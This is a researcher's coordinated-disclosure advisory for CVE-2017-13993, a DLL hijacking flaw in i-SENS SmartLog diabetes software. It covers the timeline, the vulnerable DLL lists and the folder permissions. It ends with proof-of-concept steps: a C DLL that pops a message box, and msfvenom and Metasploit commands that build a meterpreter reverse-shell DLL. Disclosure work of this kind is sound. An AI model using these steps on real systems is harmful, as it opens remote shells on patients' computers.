(CVE-2017-13993) i-SENS Inc. SmartLog Diabetes Management Software Vulnerability

Background:

On the 03rd August 2017 I discovered an Uncontrolled Search Path Element (CWE-427) vulnerability in i-SENS Inc. SmartLog Diabetes Management Software. This vulnerability can be exploited by placing a crafted DLL file in the search path which is loaded prior to a valid DLL, allowing an attacker to hijack the DLL and execute arbitrary code on the targeted system. The SmartLog Diabetes Management Software, is used by patients to track and monitor personal blood glucose levels by connecting their blood glucose meters via USB to a computer. According to i-SENS Inc., SmartLog Diabetes Management Software is deployed across the Healthcare and Public Health sector. i-SENS estimates that these products are distributed and used worldwide.

Coordinated disclosure regarding the identified vulnerability was undertaken with i-SENS Inc. The US Department of Homeland Security’s ICS-CERT have published the findings under ICS-CERT Advisory ICSMA-17-250-01, and allocated CVE-ID CVE-2017-13993.

The Department of Homeland Security’s ICS-CERT advisory (ICSMA-17-250-01) can be found here.

In response to the coordinated disclosure activities, i-SENS Inc. have released version 2.4.1 to address the vulnerability. The new version of SmartLog can be found here.

Uncontrolled Search Path Element (CVE-2017-13993 | CVSS v3 7.3)

Summary
Product: SmartLog Diabetes Management Software 2.4.0
Version: Latest version 2.4.0 and prior
Vendor: i-SENS Inc. (www.i-sens.com)
CVE-ID: CVE-2017-13993.
CWE-427: Uncontrolled Search Path Element
CVSS v3: Base Score 7.3 (CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H)

An uncontrolled search path vulnerability was discovered in i-SENS Inc SmartLog Diabetes Management Software 2.4.0 and prior. This vulnerability can be exploited by placing a crafted DLL file in the search path which is loaded prior to a valid DLL, allowing an attacker to hijack the DLL and execute arbitrary code on the targeted system.

Disclosure Timeline

3 August 2017
– DLL Hijacking vulnerability discovered. Further testing commenced.

04 August 2017
– Emailed smartlog.pc@i-sens.com and custserv@caresens.com.au requesting contact details for identified vulnerabilities
– Response from i-SENS with contact details to send disclosure to.
– Vulnerability disclosure information sent to i-SENS Inc. contact (30 day advisory disclosure)

08 August 2017
– Vendor acknowledged vulnerabilities and commenced remediation works

21 August 2017
– Emailed vendor for a status update

22 August 2017
– Vendor provided a patched version of the SmartLog software and requested a retest to confirm vulnerabilities had been fixed
– Vendor confirmed 1st Sep: Public release of v2.4.1

23 August 2017
– Identified vulnerabilities retested.
– Advised vendor that vulnerabilities have been fixed with latest patch release.
– Vendor advised they have no experience with CVE-ID process and requested that I manage via ICS-CERT
– Emailed ICS-CERT requesting ticket to be raised, CVE-ID allocated, and that advisory is to be released on 1st September

08 September 2017
– CVE-ID allocated and public disclosure of the vulnerability

Tested versions

This vulnerability was tested on the following versions:

– SmartLog Diabetes Management Software 2.2.0
– SmartLog Diabetes Management Software 2.4.0

Details

i-SENS Inc SmartLog Diabetes Management Software 2.4.0 is a “program designed to provide pictorial views of your glucose levels to show trends and patterns from glucose test results downloaded from CareSens and other i-SENS glucometers. You can comprehensively manage your diabetes by recording info such as diet, exercise, medication, and insulin injections.” Further information can be found at the following URL: http://www.i-sens.com/html/sub04_03.php?ckattempt=1

Vulnerable versions of the SmartLog Diabetes Management Software 2.4.0 software use an uncontrolled search path when loading resources. An attacker may leverage this vulnerability by crafting a DLL file and copying the file to a specified location on the target system.

The SmartLog Diabetes Management Software 2.4.0 software is vulnerable to multiple separate DLL hijacking vulnerability conditions.

# DLL Hijacking upon application launch

The vulnerable versions of SmartLog Diabetes Management Software 2.4.0 software is able to be exploited by an attacker upon application launch by placing crafted DLLs into the same directory location as the application executable.

The path “c:\SmartLog2\” inherits the following permissive rights which allow any low privileged authenticated user to exploit the vulnerable by placing a crafted DLL into the uncontrolled search path.

C:\>icacls SmartLog2
SmartLog2 BUILTIN\Administrators:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(OI)(CI)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M)

# DLL Hijacking upon importing, exporting, and restoring data

The vulnerable version of SmartLog Diabetes Management Software 2.4.0 software is able to be exploited by an attacker when importing, exporting, and restoring data via the Download / Data menu option by placing crafted DLLs into the same directory location as the application executable. Overly permissible rights to the executable path allow any low privileged authenticated user to exploit the vulnerable by placing a crafted DLL into the uncontrolled search path.

# DLL Hijacking during reporting of data

The vulnerable version of SmartLog Diabetes Management Software 2.4.0 software is able to be exploited by an attacker when emailing, printing, or exporting data via the Report menu option by placing crafted DLLs into the same directory location as the application executable. Overly permissible rights to the executable path allow any low privileged authenticated user to exploit the vulnerable by placing a crafted DLL into the uncontrolled search path.

# DLL Hijacking on product installation.

i-SENS Inc. provides a windows installer package for the SmartLog Diabetes Management Software 2.4.0 software. An attacker with access to the location where the victim has stored the downloaded installer can place crafted DLLs in the search path, resulting in DLL hijacking and execution of arbitrary code on the targeted system when the product is initially installed.

Vulnerable DLLs

The following DLLs have been individually tested and can be hijacked when the vulnerable version of SmartLog Diabetes Management Software 2.4.0 software is launched:

– cryptsp.dll
– dhcpcsvc.dll
– dhcpcsvc6.dll
– libssl-7.dll
– libssl-8.dll
– libssl-10.dll
– ntmarta.dll
– rasadhlp.dll
– rpcrtremote.dll
– ssleay32.dll
– wlanapi.dll.dll

The following DLLs have been individually tested and can be hijacked when a user is importing, exporting, and restoring data within the vulnerable version of SmartLog Diabetes Management Software 2.4.0 software:

– browcli.dll
– cscapi.dll
– dfscli.dll
– linkinfo.dll
– msftedit.dll
– msi.dll
– msls31.dll
– netutils.dll
– shdocvw.dll
– slc.dll
– srvcli.dll
– windowscodecs.dll
– wkscli.dll

The following DLLs have been individually tested and can be hijacked when a user is reporting data within the vulnerable version of SmartLog Diabetes Management Software 2.4.0 software:

– cscapi.dll
– msi.dll
– propsys.dll
– slc.dll
– srvcli.dll
– windowscodecs.dll

The following DLLs have been individually tested and can be hijacked when a user initially installs the vulnerable version of SmartLog Diabetes Management Software 2.4.0 software:

– cscapi.dll
– dwmapi.dll
– linkinfo.dll
– netutils.dll
– ntmarta.dll
– ntshrui.dll
– shfolder.dll

Exploitability

An attacker must have low privileged authenticated access to the local target system in order to exploit this vulnerability, or have the ability to social engineer the user in order to accept the malformed DLL file. An attacker can use well known exploit techniques to gain access to the target system with the same privilege rights as the user running the program.

POC

#—
# MessageBox PoC
#—

This PoC will display a message box when the crafted DLL is loaded by the application.

1. Create a file called ntmarta.c with the following content:

#include

BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{

switch (fdwReason)
{
case DLL_PROCESS_ATTACH:
dll_exploit();
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}

return TRUE;
}

int dll_exploit()
{
MessageBox(0, “Success”, “ntmarta DLL Hijack”, MB_OK);
}

2. Compile as a DLL with the following command on a linux host:

> i686-w64-mingw32-gcc ntmarta.c -o ntmarta.dll -shared

3. Copy the DLL file to the same location as the application executable and observe the DLL Hijack message box popup when launching i-SENS Inc. SmartLog Diabetes Management Software 2.4.0 software.

#—
# Reverse shell PoC
#—

This PoC will result in a reverse shell connection to the target host. The attacker will inherit the same permissions as the victim user.

1. Create a DLL with a meterpreter Reverse TCP payload.

> msfvenom -p windows/meterpreter/reverse_tcp –platform windows -f dll LHOST= LPORT= > ntmarta.dll

2. Create a listener for the reverse shell in metasploit:

msf > use exploit/multi/handler
msf > set payload windows/meterpreter/reverse_tcp
msf > set lhost
msf > set lport msf > exploit

3. With the listener ready to receive the reverse shell, copy the DLL file to the same location as the application executable and observe a reverse shell connection from the target system to the attacking host when launching i-SENS Inc. SmartLog Diabetes Management Software 2.4.0 software.